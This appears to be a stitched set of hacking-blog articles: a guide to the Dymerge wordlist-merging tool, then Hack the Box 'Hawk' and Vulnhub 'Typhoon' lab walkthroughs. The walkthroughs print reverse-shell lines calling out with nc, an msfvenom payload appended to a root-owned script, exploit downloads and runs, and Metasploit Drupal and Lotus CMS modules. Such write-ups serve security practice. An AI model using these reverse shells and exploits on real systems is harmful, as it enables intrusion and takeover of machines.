Comprehensive Guide on Dymerge


Hello friends! This article is a comprehensive guide to the Dymerge tool, a handy little utility that helps you manage all the dictionaries you have created while reading through our blog and using the amazing tools we have written about.

Table of Contents
§  What is Dymerge
§  Installing and Launching Dymerge
§  Standard Merge
§  Fast Mode
§  Removing Duplicates
§  Reverse Listing
§  Alphabetic and Numeric Sorting
§  Defining Output
§  Including Characters
§  Compressing Output

Introduction to Dymerge
Dymerge is a tool that gives you the ability to manage dictionaries. By manage we mean it lets you reshape and merge them. Reshaping and merging may seem trivial, but considering that you could be dealing with millions of words, even the smallest operation can turn into a mammoth and complicated task.

Installing and Launching Dymerge

We can install Dymerge from GitHub and launch it with a couple of simple commands. We have used the "-h" flag to display the various options Dymerge has to offer.

git clone https://github.com/k4m4/dymerge.git
cd dymerge
./dymerge.py -h

Standard Merge

We hope you have a few dictionaries handy to follow along with what we are doing. This is a standard merge, where we specify the paths to 2 different dictionaries and Dymerge combines them.
To avoid any confusion, the command is "./dymerge.py" followed by the path of the first dictionary, then a space and the path to the second dictionary. By default the output will be written to a file named "dymerged.txt".

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt


Fast Mode
Arguably if the dictionaries are very large, performing any operation on them will take time. The person who made Dymerge thought of this conundrum and gave us a way to speed up the process by using the “-f” flag.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -f



Removing Duplicates

A lot of dictionary-making software follows the same logic, so there are bound to be identical words from time to time. Dymerge gives us the option to remove duplicate words from the dictionaries while combining them. To achieve this, we will be using the "-u" flag.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -u -f


Reverse Listing

Dymerge gives us the option to reverse the order of the words in the dictionaries that we merge; this means that the first word in the new dictionary will be the last word of the second dictionary. The flag for this is "-r".
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -r -f


Alphabetic and Numeric Sorting

This option lets us sort words alphabetically; it also sorts numbers by following the progression of a number line from left to right when merging 2 dictionaries into 1. We will be using the "-s" flag to perform this operation.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f


Defining Output

So far we have been letting Dymerge save the output using its default settings; this time we will define the file name and destination of the output by using the "-o" flag.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -o /root/output.txt

Including Characters

Just in case we find that we need something specific added to the dictionary, we can use the "-i" flag. Any characters placed after the include flag are added to the dictionary.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -i raj

And here we see “raj” being added to the dictionary.


Compressing Output
Dictionaries can be pretty big in size, especially when you’re talking about a unified dictionary comprised of multiple dictionaries. Dymerge gives us the option to compress our output using the “-z” flag.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -z zip
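As an added example (not Dymerge's own code), here is a small Python re-implementation of the merge, unique, reverse, sort, include and zip steps walked through above, so the reshaping logic is visible in one place. The ordering of numbers versus words under "-s" and the ".zip" naming are assumptions, and the two sample dictionaries are constructed.

```python
import tempfile
import zipfile
from pathlib import Path

def sort_key(word):
    # Assumed reading of -s: digit-only entries sort by numeric value and come
    # first; every other entry follows in plain alphabetical order.
    return (0, int(word), "") if word.isdigit() else (1, 0, word)

def merge_wordlists(paths, unique=False, reverse=False, sort=False, include=()):
    """Concatenate dictionaries in order, then apply the -u/-r/-s/-i reshaping steps."""
    words = []
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            words.extend(line.rstrip("\r\n") for line in fh if line.strip())
    words.extend(include)                   # -i: extra entries go in too
    if unique:
        words = list(dict.fromkeys(words))  # -u: drop repeats, keep first position
    if reverse:
        words.reverse()                     # -r: last word of the last file first
    if sort:
        words.sort(key=sort_key)            # -s: numbers on a number line, then a-z
    return words

def write_wordlist(words, out_path, zip_output=False):
    """Save the merged list; zip_output mirrors '-z zip' (other -z formats not modelled)."""
    out_path = Path(out_path)
    data = "\n".join(words) + "\n"
    if not zip_output:
        out_path.write_text(data, encoding="utf-8")
        return out_path
    archive = out_path.with_name(out_path.name + ".zip")
    with zipfile.ZipFile(archive, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(out_path.name, data)
    return archive

def read_back(archive):
    """Reopen the zip produced above and return the words it holds."""
    with zipfile.ZipFile(archive) as zf:
        return zf.read(zf.namelist()[0]).decode("utf-8").split()

def demo():
    """Constructed sample: two tiny overlapping dictionaries merged with -u -s -i."""
    tmp = Path(tempfile.mkdtemp())
    (tmp / "raj.txt").write_text("raj\n123\nalice\nbob\n")
    (tmp / "rockyou.txt").write_text("bob\n42\ncarol\n")
    merged = merge_wordlists([tmp / "raj.txt", tmp / "rockyou.txt"],
                             unique=True, sort=True, include=["raj123"])
    return merged, read_back(write_wordlist(merged, tmp / "dymerged.txt", zip_output=True))
```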

All said and done, this is a pretty neat little tool to use when you are dealing with multiple dictionaries and need something to bring a little bit of order. The functions it performs may seem simple on the face of it, but they are without a doubt very useful.
Stay tuned for more articles on the latest and greatest in hacking.

Hack the Box: Hawk Walkthrough

Today we are going to solve another CTF challenge, "HawkNew". HawkNew is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Easy
Task: To find user.txt and root.txt
Note: Since these labs are available online, they have static IPs. The IP of HawkNew is 10.10.10.102

Penetration Methodology:
§  Port scanning and IP discovery
§  Anonymous FTP Login
§  Checking file type
§  Getting Login Credentials
§  Browsing IP through port 80
§  Exploiting Drupal
§  Reading First Flag User.txt
§  Getting Login Credentials
§  Spawning TTY Shell
§  Searching exploit via Searchsploit
§  Getting root Access
§  Reading Final Flag Root.txt

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and running services.

nmap -A 10.10.10.102

The Nmap output shows various open ports: 21(ftp), 22(ssh), 80 http server (Drupal CMS), 8082(h2 database http console).



From the Nmap scan output we saw that FTP port 21 is open, and the next thing that catches our eye is that anonymous login is allowed.

ftp 10.10.10.102

We easily connected to FTP through anonymous login. After navigating through multiple directories we found a hidden file, ".drupal.txt.enc", and transferred it to our local machine.



Since .drupal.txt.enc is encrypted, let's check the file type using the 'file' command.

file .drupal.txt.enc

It came out to be OpenSSL-encrypted data with a salted password. Clearly we need to decrypt the file to get any further clue.




To crack this file, we have used an OpenSSL brute-force tool which is easily available on GitHub. You can download it from the link below, or run the following commands to download it and execute the script.

git clone https://github.com/deltaclock/go-openssl-bruteforce.git
./openssl-brute --file /root/.drupal.txt.enc

Boom!! We have successfully cracked the file, and the password hint we got is "PencilKeyboardScanner123". This could be the password for the CMS login. Let's check it.



As port 80 is running an HTTP server, we opened the target machine's IP address in our browser and found a Drupal login page. To log in to this page we used the username admin and the password PencilKeyboardScanner123.


Oh yeah!! We have successfully logged into the admin dashboard. Now go to Modules and enable the check boxes for Path and PHP filter.





After that, go to Content > Add Content > Basic Page to create a basic page where we can write the code that spawns the web shell. Give the page any title.
Here we have written a one-liner PHP reverse shell taken from the Pentest Monkey website.

&1|nc 10.10.14.10 1234 >/tmp/f"); ?>

Then select the Text format "PHP code". Before saving it, start a netcat listener on the listening port, so that once the code is executed it establishes a reverse connection.
nc -lvp 1234




We got a reverse connection from the victim's machine on our netcat listener. To spawn a proper shell we used the python3 pty one-liner.

python3 -c 'import pty;pty.spawn("/bin/bash")'

Inside /home/daniel we found the user.txt flag; now it is time to find the root flag. While exploring the directories, we thought of reading the contents of the "settings.php" file, where we found the password: drupal4hawk
cat settings.php | grep Password


Then with the following command we switched user and logged in as daniel.
su daniel
Password: drupal4hawk
Here we have used two simple python3 commands to escape the python3 interpreter into a bash shell.
>>> import pty
>>> pty.spawn('/bin/bash')


From the Nmap scan output we noticed that an H2 database is running on port 8082, so we searched for an H2 database exploit in searchsploit.
searchsploit H2 database
It came out to be a remote code execution exploit. The one we used is highlighted; we copied the exploit 45506.py to the /root directory and started a Python web server to serve the file to the target machine.
searchsploit -m 45506
python -m SimpleHTTPServer 8080



Afterwards we downloaded the exploit 45506.py into the /tmp directory of the target machine, granted it full permissions and executed it with the following commands.
cd /tmp
wget http://10.10.14.10:8080/45506.py
chmod 777 45506.py
python3 45506.py -H 127.0.0.1:8082
id
Finally!! We have got root access. Now let's go and get the "root.txt". We take a look at the content of the file and find our final flag.





Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles, contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst.

Typhoon: Vulnhub Walkthrough


Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.
Flag: root-flag
Since there are multiple ways in which we can exploit this machine, we have used more than one method to capture the flag, as follows:
Method 1: Using a local privilege escalation exploit after logging in over SSH.
Let’s Begin with the Walkthrough!!
Let's start off with scanning the network to find our target's IP.
netdiscover


We found our target IP: 192.168.1.105
Our next step is to scan the target IP with nmap.
nmap -A 192.168.1.101
The Nmap output shows various open ports: 21(ftp), 22(ssh), 25(smtp), 53(domain), 80(http), 110(pop3), 111(rpcbind), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 631(ipp), 993(ssl/imaps), 995(ssl/pop3), 2049(nfs_acl), 3306(mysql), 5432(postgresql), 8080(http).
Further, we notice that there is an entry /mongoadmin/ in robots.txt, which might be useful.




We also noticed that port 8080 is open, running Apache Tomcat/Coyote JSP Engine 1.1. This could be another way of exploiting this machine, but we will come to it later.


Moving on, since port 80 is also open, we browsed to the directory we found, /mongoadmin/. The result is shown in the image. Here we change the database to credentials (84mb), which displays a link to 2 credentials. Click on it.


Clicking on the 2 credentials link gives us 2 credentials: [username]:typhoon and [password]:789456123. These credentials might be a great help for further enumeration.


After some time, we struck on an idea: why not use the found credentials to log in over SSH, since SSH port 22 is also open?
So we simply logged in to SSH with the credentials Username: typhoon & Password: 789456123
ssh typhoon@192.168.1.101
Then we checked the system information and found out that Ubuntu 14.04 is running on the target machine. Luckily we were familiar with an exploit for Ubuntu 14.04.


Next we looked for an exploit for Ubuntu 14.04 using searchsploit. The exploit we used is highlighted; we copied the exploit 37292.c to the /root/ directory and started a Python web server to serve the file to the target machine.


Afterwards we downloaded the exploit 37292.c into the /tmp directory, compiled it, granted it permissions and executed it.
Booyeah!! We have got root access and found our FLAG. We take a look at the content of the file and are greeted with a congratulatory message.


Method 2
Using Tomcat Manager Upload to get the meterpreter and then further establishing a reverse connection to get root access.
Let’s Begin with the Walkthrough!!
Since the port scan in Method 1 showed that port 8080 is open, running Apache Tomcat/Coyote JSP Engine 1.1, let's browse to the target IP on port 8080.


We are very familiar with the Tomcat Manager login from our previous lab experiences. Without wasting time we logged straight into the Tomcat server using Metasploit's Tomcat Manager module with the default Tomcat credentials.
[username]:tomcat
[password]:tomcat
Oh Yeah! We have got the meterpreter. After spending a lot of time on enumeration, we found a directory /tab containing a file script.sh that was owned by root and had full permissions for everyone. So we thought of inserting our code into script.sh.
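As an added defender-side check (not code from the box or from this walkthrough), the following Python audit walks a directory tree and reports root-owned files that group or others may modify, which is the misconfiguration that turned script.sh into a privilege escalation path. The sample tree and its file names are constructed, and the test audits files owned by the current user because it cannot chown to root.

```python
import os
import stat
import tempfile
from pathlib import Path

def find_loosely_writable(root, owner_uid=0):
    """Return (relative path, mode) for regular files under `root` owned by
    `owner_uid` (root by default) that group or others are allowed to write.
    A root-owned script anyone can edit lets a low-privileged user run code
    as root as soon as something privileged (cron, a service) executes it."""
    root = Path(root)
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            st = path.lstat()
            if not stat.S_ISREG(st.st_mode):
                continue                       # symlinks/devices: judged where they live
            if st.st_uid != owner_uid:
                continue                       # only the privileged owner matters here
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                hits.append((str(path.relative_to(root)), oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)

def demo():
    """Constructed tree: a 0777 script (bad) and a 0755 script (fine) under /tab.
    Owner is the current user, so the audit is run with owner_uid=os.getuid()."""
    root = Path(tempfile.mkdtemp())
    (root / "tab").mkdir()
    loose = root / "tab" / "script.sh"
    loose.write_text("#!/bin/sh\necho maintenance\n")
    loose.chmod(0o777)
    safe = root / "tab" / "backup.sh"
    safe.write_text("#!/bin/sh\necho backup\n")
    safe.chmod(0o755)
    return find_loosely_writable(root, owner_uid=os.getuid())
```

On a real host the same function run over /etc, /opt and the cron directories with the default owner_uid=0 lists exactly the files that need their mode tightened.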


Moving on!! We need to create a bash payload using msfvenom:
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=1234 R
After that, append the generated code to the script.sh file.


echo “mkfifo /tmp/vvwjo; nc 192.168.1.109 1234 0
/tmp/vvwjo 2>&1; rm /tmp/vvwjo” > script.sh


When script.sh was executed, the appended code ran with it, and we got a reverse shell on our netcat listener.
Yeah!! We have got root access and found root-flag. We take a look at the content of the file and are greeted with a congratulatory message.



3rd Method: Exploiting Drupal CMS
Unfortunately, on exploring port 80 we did not observe anything remarkable, so we enumerated the web directories with the help of the Dirb tool.

dirb http://192.168.1.101

It was wonderful to observe that there were two CMSs, as highlighted in the image below.




On opening /drupal in the web browser, it put up the following web page, which belongs to Drupal CMS.




Without wasting much time, we turn to Metasploit and run the following module to exploit Drupal CMS.
use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.101
msf exploit(unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit
Boom!! It was a terrific moment to see a meterpreter session on the target machine. For post-exploitation you can follow the methodology already discussed in the 1st method.




4th Method: Exploiting Lotus CMS
Scroll up and notice the result we obtained from the dirb scan, where we found two CMSs. We have already exploited Drupal; now let's go for the next CMS and try to exploit it, if possible.
So on opening /cms in the web browser, it put up the following web page, which belongs to Lotus CMS.




Without wasting much time, we again turn to Metasploit and run the following module to exploit Lotus CMS.

use exploit/multi/http/lcms_php_exec
msf exploit(multi/http/lcms_php_exec) > set rhost 192.168.1.101
msf exploit(multi/http/lcms_php_exec) > set uri /cms/
msf exploit(multi/http/lcms_php_exec) > exploit

Great, we own another meterpreter session on the target machine. For post-exploitation you can follow the methodology already discussed in the 1st method.